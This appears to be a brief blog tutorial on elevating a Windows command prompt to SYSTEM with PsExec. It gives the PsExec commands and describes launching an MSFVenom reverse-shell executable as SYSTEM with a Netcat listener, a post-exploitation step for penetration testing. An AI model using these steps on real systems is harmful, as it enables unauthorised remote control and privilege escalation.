This is post is on elevating your CMD to SYSTEM access. Let’s get started!
- Psexec.exe (Sysinternal tool)
- Local administration privilege
Firstly, launch CMD in administrative privilege if you are on GUI. Otherwise, make sure you are on an admin account in a reverse/bind shell.
Local spawn CMD
In your CMD:
> Psexec.exe -s -i cmd.exe
Make sure you have a compiled EXE file which can be a reverse shell from MSFVenom. Listen via your Netcat in the specified port when creating the reverse shell. In your CMD:
> Psexec.exe -s -i msfRevShell.exe
It should show you this when you run the
> whoami nt authority\system
I hope this post has been helpful to you. Feel free to leave any comments below. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here. 🙂